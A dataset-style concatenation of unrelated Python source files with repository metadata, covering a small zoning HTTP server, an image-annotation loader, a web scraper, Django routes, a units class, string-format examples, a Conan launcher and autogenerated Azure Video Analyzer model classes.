if 'far_explicit' in options:
changes.append("set all FAR maximums to %s" % options['far_explicit'])
elif 'far_factor' in options and options['far_factor'] != 1.0:
changes.append('increase FAR maximums by a factor of %s' % options['far_factor'])
if len(changes):
return ", ".join(changes)
else:
return ""
def serve(options):
d = open("unit_template.html")
template = Template( d.read() )
unit_count = int(compute_count(options))
data = {}
data['changes'] = describe(options)
data['unit_count'] = unit_count
data['increase'] = unit_count-37453
data['table'] = table(options)
data['options'] = options
s = template.render(**data)
return s
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
# Send the html message
form = parse_qs(urlparse(self.path).query)
options = {}
for i in ['far_factor', 'lot_factor']:
if i in form:
options[i] = float(form[i][0])
else:
options[i] = 1.0
if 'far_explicit' in form and form['far_explicit']:
options['far_explicit'] = float(form['far_explicit'][0])
if 'lot_explicit' in form and form['lot_explicit']:
options['lot_explicit'] = int(form['lot_explicit'][0])
if 'lot' in form:
options['no_lot'] = True
if 'singlefamily' in form:
options['no_a'] = True
if 'twofamily' in form:
options['no_b'] = True
self.wfile.write(serve(options))
return
def run():
try:
#Create a web server and define the handler to manage the
#incoming request
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
#Wait forever for incoming htto requests
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
if __name__ == "__main__":
print run()
| [] |
AbhiK002/Matrix | matrix/__init__.py | 2d83f08877dccba9e4c710bd5fb65f613848d63f | from .main import Matrix
| [] |
jasstionzyf/Mask_RCNN | samples/cmk/test.py | 971a9dd9be1f9716e6f7c23b959bd57079cd93eb |
import os
import sys
import json
import datetime
import numpy as np
import glob
import skimage
from PIL import Image as pil_image
import cv2
import cv2
def locationToMask(locations=None,height=None,width=None):
mask = np.zeros([height, width, len(locations)],
dtype=np.uint8)
for index,location in enumerate(locations):
x1, y1, x2, y2 = location
mask[y1:y2+1,x1:x2+1,index]=1
print(mask[:,:,index])
return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32)
def load_cmk(dataset_dir, subset):
folder=os.path.join(dataset_dir, subset)
imagesPattern=folder+'/*.jpg'
for image_path in glob.glob(imagesPattern):
print(image_path)
img = cv2.imread(image_path)
height,width = img.shape[:2]
imageId=os.path.basename(image_path).replace('.jpg','')
print(imageId)
#
# self.add_image(
# "balloon",
# image_id=a['filename'], # use file name as a unique image id
# path=image_path,
# width=width, height=height,
# polygons=polygons)
locationsFile='%s/%s.txt' % (folder,imageId)
locations=[]
with open(locationsFile) as fp:
lines = fp.readlines()
for line in lines:
line = line.replace('\n', '')
if len(line.split(' ')) < 5:
break
classIndex, xcen, ycen, w, h = line.strip().split(' ')
xmin = max(float(xcen) - float(w) / 2, 0)
xmax = min(float(xcen) + float(w) / 2, 1)
ymin = max(float(ycen) - float(h) / 2, 0)
ymax = min(float(ycen) + float(h) / 2, 1)
xmin = int(width * xmin)
xmax = int(width * xmax)
ymin = int(height * ymin)
ymax = int(height * ymax)
location=(xmin,ymin,xmax,ymax)
locations.append(location)
print(locations)
dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/'
subset='val'
load_cmk(dataset_dir=dataset_dir,subset=subset)
locations=[(2,3,5,7),(8,8,9,9)]
height=10
width=10
# mask,classIds=locationToMask(locations=locations,height=height,width=width)
# print(mask)
# print(classIds)
| [((51, 11, 51, 44), 'os.path.join', 'os.path.join', ({(51, 24, 51, 35): 'dataset_dir', (51, 37, 51, 43): 'subset'}, {}), '(dataset_dir, subset)', False, 'import os\n'), ((54, 22, 54, 46), 'glob.glob', 'glob.glob', ({(54, 32, 54, 45): 'imagesPattern'}, {}), '(imagesPattern)', False, 'import glob\n'), ((37, 33, 37, 74), 'numpy.ones', 'np.ones', (), '', True, 'import numpy as np\n'), ((57, 14, 57, 36), 'cv2.imread', 'cv2.imread', ({(57, 25, 57, 35): 'image_path'}, {}), '(image_path)', False, 'import cv2\n'), ((59, 16, 59, 44), 'os.path.basename', 'os.path.basename', ({(59, 33, 59, 43): 'image_path'}, {}), '(image_path)', False, 'import os\n')] |
ZhongXinWang/python | myBeautifulSoup.py | 4cf3ecdc9d9e811e777c6d8408a8319097cfdec3 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com';
with requests.get(url) as r:
r.encoding='utf-8'
soup = BeautifulSoup(r.text)
#格式化
pret = soup.prettify();
u = soup.select('#u1 a')
for i in u:
print("名称:%s,地址:%s" % (i.getText(),i.get('href'))) | [((8, 5, 8, 22), 'requests.get', 'requests.get', ({(8, 18, 8, 21): 'url'}, {}), '(url)', False, 'import requests\n'), ((10, 8, 10, 29), 'bs4.BeautifulSoup', 'BeautifulSoup', ({(10, 22, 10, 28): 'r.text'}, {}), '(r.text)', False, 'from bs4 import BeautifulSoup\n')] |
adityakekare/NewsAPIDjango | blogsNewsModule/urls.py | 47ff0c69e3d48c10a257c8221916ccd2fdaf9abb | from django.urls import path, include
from . import views
urlpatterns = [
path("", views.newsView, name="home"),
path("createBlog", views.CreateBlogView.as_view(), name="createBlog"),
path("myBlogs", views.PostListView.as_view(), name="myBlogs"),
path("single/<int:pk>", views.PostDetailView.as_view(), name="single"),
path("subscribe", views.subscribeView,name="subscribe"),
path("about", views.aboutView, name="about"),
path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"),
path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"),
path("like/<int:pk>", views.LikeView, name="like_post"),
# API urls for superuser
path("api/create/", views.APICreateView.as_view()),
path("api/posts/", views.APIListView.as_view()),
path("api/posts/<int:pk>", views.APIDetailView.as_view()),
] | [((5, 4, 5, 41), 'django.urls.path', 'path', (), '', False, 'from django.urls import path, include\n'), ((9, 4, 9, 59), 'django.urls.path', 'path', (), '', False, 'from django.urls import path, include\n'), ((10, 4, 10, 48), 'django.urls.path', 'path', (), '', False, 'from django.urls import path, include\n'), ((13, 4, 13, 59), 'django.urls.path', 'path', (), '', False, 'from django.urls import path, include\n')] |
MatthewZheng/UnitsPlease | unitClass.py | 5911267b5a0a78dd4d833c6be46e89caaf98c200 | #!/usr/bin/python
_author_ = "Matthew Zheng"
_purpose_ = "Sets up the unit class"
class Unit:
'''This is a class of lists'''
def __init__(self):
self.baseUnits = ["m", "kg", "A", "s", "K", "mol", "cd", "sr", "rad"]
self.derivedUnits = ["Hz", "N", "Pa", "J", "W", "C", "V", "F", "ohm", "S", "Wb", "T", "H", "°C", "lm", "lx", "Bq", "Gy", "Sv", "kat"]
def baseCheck(self, userList):
'''Converts elements in str list to base units'''
converted = []
for i in (userList):
isSquared = False
unitPreIndex = ""
#checks if it has a carat in the expression
for ind, j in enumerate(list(i)):
if j == "^":
isSquared = True
unitPreIndex = ''.join(list(i)[:ind])
break
#converts non-unary unit to base unit and checks for squared variables
while(i not in (self.baseUnits or self.derivedUnits) and len(list(i)) != 1 and unitPreIndex not in (self.baseUnits or self.derivedUnits) and len(unitPreIndex) != 1):
orgNameList = list(i)
#identify prefix removed
self.idPrefix = orgNameList.pop(0)
i = ''.join(orgNameList)
print("The program removed the prefix %s and converted your unit to it's base unit: %s." % (self.idPrefix, i))
#checks if it is a special unit
if(i not in (self.baseUnits and self.derivedUnits)):
#append in case for special units
break
else:
#append in case for base unit
break
#Appends base unit
if(i in (self.baseUnits or self.derivedUnits) and isSquared == False):
converted.append(i)
elif(isSquared == True):
toAppend = []
numReps = []
#run once to get number of times the unit is squared
for index, val in enumerate(list(i)):
if val == "^":
numStart = index+1
numReps.append(''.join(list(i)[numStart:]))
toAppend.append(''.join(list(i)[:index]))
break
#convert numReps into an int
intReps = int(''.join(numReps))
#append number of units specified by the carat
for l in range (intReps):
if(''.join(toAppend) not in (self.baseUnits or self.derivedUnits)):
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % ''.join(toAppend))
converted.append(''.join(toAppend))
#Exception for special units
else:
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % i)
converted.append(i)
return(converted)
| [] |
MathAdventurer/Data_Mining | week4/string_format.py | b0a06b5f7c13a3762a07eb84518aa4ee56896516 | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 22:23:07 2020
@author: Neal LONG
Try to construct URL with string.format
"""
base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}"
stock = "000002"
api_type = 'cp'
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
stock = "00002"
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
print('='*40)
print('{:>6}'.format('236'))
print('{:>06}'.format('236'))
print("Every {} should know the use of {}-{} programming and {}"
.format("programmer", "Open", "Source", "Operating Systems"))
print("Every {3} should know the use of {2}-{1} programming and {0}"
.format("programmer", "Open", "Source", "Operating Systems")) | [] |
Wonders11/conan | conans/server/server_launcher.py | 28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8 | from conans.server.launcher import ServerLauncher
from conans.util.env_reader import get_env
launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME"))
app = launcher.server.root_app
def main(*args):
launcher.launch()
if __name__ == "__main__":
main()
| [((5, 37, 5, 65), 'conans.util.env_reader.get_env', 'get_env', ({(5, 45, 5, 64): '"""CONAN_SERVER_HOME"""'}, {}), "('CONAN_SERVER_HOME')", False, 'from conans.util.env_reader import get_env\n')] |
praveenkuttappan/azure-sdk-for-python | sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py | 4b79413667b7539750a6c7dde15737013a3d4bd5 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class Resource(msrest.serialization.Model):
"""Common fields that are returned in the response for all Azure Resource Manager resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.system_data = None
class ProxyResource(Resource):
"""The resource model definition for a Azure Resource Manager proxy resource. It will not have tags and a location.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(ProxyResource, self).__init__(**kwargs)
class AccessPolicyEntity(ProxyResource):
"""Access policies help define the authentication rules, and control access to specific video resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param role: Defines the access level granted by this policy. Possible values include:
"Reader".
:type role: str or ~video_analyzer.models.AccessPolicyRole
:param authentication: Authentication method to be used when validating client API access.
:type authentication: ~video_analyzer.models.AuthenticationBase
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'role': {'key': 'properties.role', 'type': 'str'},
'authentication': {'key': 'properties.authentication', 'type': 'AuthenticationBase'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntity, self).__init__(**kwargs)
self.role = kwargs.get('role', None)
self.authentication = kwargs.get('authentication', None)
class AccessPolicyEntityCollection(msrest.serialization.Model):
"""A collection of AccessPolicyEntity items.
:param value: A collection of AccessPolicyEntity items.
:type value: list[~video_analyzer.models.AccessPolicyEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[AccessPolicyEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class AccountEncryption(msrest.serialization.Model):
"""Defines how the Video Analyzer account is (optionally) encrypted.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type: Required. The type of key used to encrypt the Account Key. Possible values
include: "SystemKey", "CustomerKey".
:type type: str or ~video_analyzer.models.AccountEncryptionKeyType
:param key_vault_properties: The properties of the key used to encrypt the account.
:type key_vault_properties: ~video_analyzer.models.KeyVaultProperties
:param identity: The Key Vault identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Key Vault mapping.
:vartype status: str
"""
_validation = {
'type': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'key_vault_properties': {'key': 'keyVaultProperties', 'type': 'KeyVaultProperties'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccountEncryption, self).__init__(**kwargs)
self.type = kwargs['type']
self.key_vault_properties = kwargs.get('key_vault_properties', None)
self.identity = kwargs.get('identity', None)
self.status = None
class AudioEncoderBase(msrest.serialization.Model):
"""Base type for all audio encoder presets, which define the recipe or instructions on how audio should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AudioEncoderAac.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.AudioEncoderAac': 'AudioEncoderAac'}
}
def __init__(
self,
**kwargs
):
super(AudioEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
class AudioEncoderAac(AudioEncoderBase):
"""A custom preset for encoding audio with the AAC codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AudioEncoderAac, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.AudioEncoderAac' # type: str
class AuthenticationBase(msrest.serialization.Model):
"""Base class for access policies authentication methods.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: JwtAuthentication.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.JwtAuthentication': 'JwtAuthentication'}
}
def __init__(
self,
**kwargs
):
super(AuthenticationBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CertificateSource(msrest.serialization.Model):
"""Base class for certificate sources.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: PemCertificateList.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.PemCertificateList': 'PemCertificateList'}
}
def __init__(
self,
**kwargs
):
super(CertificateSource, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class CheckNameAvailabilityRequest(msrest.serialization.Model):
"""The check availability request body.
:param name: The name of the resource for which availability needs to be checked.
:type name: str
:param type: The resource type.
:type type: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityRequest, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.type = kwargs.get('type', None)
class CheckNameAvailabilityResponse(msrest.serialization.Model):
"""The check availability result.
:param name_available: Indicates if the resource name is available.
:type name_available: bool
:param reason: The reason why the given name is not available. Possible values include:
"Invalid", "AlreadyExists".
:type reason: str or ~video_analyzer.models.CheckNameAvailabilityReason
:param message: Detailed reason why the given name is available.
:type message: str
"""
_attribute_map = {
'name_available': {'key': 'nameAvailable', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CheckNameAvailabilityResponse, self).__init__(**kwargs)
self.name_available = kwargs.get('name_available', None)
self.reason = kwargs.get('reason', None)
self.message = kwargs.get('message', None)
class CredentialsBase(msrest.serialization.Model):
"""Base class for credential objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: UsernamePasswordCredentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.UsernamePasswordCredentials': 'UsernamePasswordCredentials'}
}
def __init__(
self,
**kwargs
):
super(CredentialsBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TokenKey(msrest.serialization.Model):
"""Key properties for JWT token validation.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EccTokenKey, RsaTokenKey.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EccTokenKey': 'EccTokenKey', '#Microsoft.VideoAnalyzer.RsaTokenKey': 'RsaTokenKey'}
}
def __init__(
self,
**kwargs
):
super(TokenKey, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.kid = kwargs['kid']
class EccTokenKey(TokenKey):
"""Required validation properties for tokens generated with Elliptical Curve algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. Elliptical curve algorithm to be used: ES256, ES384 or ES512. Possible
values include: "ES256", "ES384", "ES512".
:type alg: str or ~video_analyzer.models.AccessPolicyEccAlgo
:param x: Required. X coordinate.
:type x: str
:param y: Required. Y coordinate.
:type y: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'x': {'required': True},
'y': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'x': {'key': 'x', 'type': 'str'},
'y': {'key': 'y', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EccTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EccTokenKey' # type: str
self.alg = kwargs['alg']
self.x = kwargs['x']
self.y = kwargs['y']
class EdgeModuleEntity(ProxyResource):
"""The representation of an edge module.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar edge_module_id: Internal ID generated for the instance of the Video Analyzer edge module.
:vartype edge_module_id: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'edge_module_id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'edge_module_id': {'key': 'properties.edgeModuleId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntity, self).__init__(**kwargs)
self.edge_module_id = None
class EdgeModuleEntityCollection(msrest.serialization.Model):
"""A collection of EdgeModuleEntity items.
:param value: A collection of EdgeModuleEntity items.
:type value: list[~video_analyzer.models.EdgeModuleEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[EdgeModuleEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class EdgeModuleProvisioningToken(msrest.serialization.Model):
"""Provisioning token properties. A provisioning token allows for a single instance of Azure Video analyzer IoT edge module to be initialized and authorized to the cloud account. The provisioning token itself is short lived and it is only used for the initial handshake between IoT edge module and the cloud. After the initial handshake, the IoT edge module will agree on a set of authentication keys which will be auto-rotated as long as the module is able to periodically connect to the cloud. A new provisioning token can be generated for the same IoT edge module in case the module state lost or reset.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The expiration date of the registration token. The Azure Video Analyzer
IoT edge module must be initialized and connected to the Internet prior to the token expiration
date.
:vartype expiration_date: ~datetime.datetime
:ivar token: The token blob to be provided to the Azure Video Analyzer IoT edge module through
the Azure IoT Edge module twin properties.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(EdgeModuleProvisioningToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class EncoderPresetBase(msrest.serialization.Model):
"""Base type for all encoder presets, which define the recipe or instructions on how the input content should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderCustomPreset, EncoderSystemPreset.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderCustomPreset': 'EncoderCustomPreset', '#Microsoft.VideoAnalyzer.EncoderSystemPreset': 'EncoderSystemPreset'}
}
def __init__(
self,
**kwargs
):
super(EncoderPresetBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class EncoderCustomPreset(EncoderPresetBase):
"""Describes a custom preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param audio_encoder: Describes a custom preset for encoding audio.
:type audio_encoder: ~video_analyzer.models.AudioEncoderBase
:param video_encoder: Describes a custom preset for encoding video.
:type video_encoder: ~video_analyzer.models.VideoEncoderBase
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'audio_encoder': {'key': 'audioEncoder', 'type': 'AudioEncoderBase'},
'video_encoder': {'key': 'videoEncoder', 'type': 'VideoEncoderBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderCustomPreset, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderCustomPreset' # type: str
self.audio_encoder = kwargs.get('audio_encoder', None)
self.video_encoder = kwargs.get('video_encoder', None)
class NodeBase(msrest.serialization.Model):
"""Base class for nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: ProcessorNodeBase, SinkNodeBase, SourceNodeBase.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.ProcessorNodeBase': 'ProcessorNodeBase', '#Microsoft.VideoAnalyzer.SinkNodeBase': 'SinkNodeBase', '#Microsoft.VideoAnalyzer.SourceNodeBase': 'SourceNodeBase'}
}
def __init__(
self,
**kwargs
):
super(NodeBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.name = kwargs['name']
class ProcessorNodeBase(NodeBase):
"""Base class for topology processor nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: EncoderProcessor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.EncoderProcessor': 'EncoderProcessor'}
}
def __init__(
self,
**kwargs
):
super(ProcessorNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.ProcessorNodeBase' # type: str
self.inputs = kwargs['inputs']
class EncoderProcessor(ProcessorNodeBase):
"""Encoder processor allows for encoding of the input content. For example, it can used to change the resolution from 4K to 1280x720.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param preset: Required. The encoder preset, which defines the recipe or instructions on how
the input content should be processed.
:type preset: ~video_analyzer.models.EncoderPresetBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'preset': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'preset': {'key': 'preset', 'type': 'EncoderPresetBase'},
}
def __init__(
self,
**kwargs
):
super(EncoderProcessor, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.EncoderProcessor' # type: str
self.preset = kwargs['preset']
class EncoderSystemPreset(EncoderPresetBase):
"""Describes a built-in preset for encoding the input content using the encoder processor.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Name of the built-in encoding preset. Possible values include:
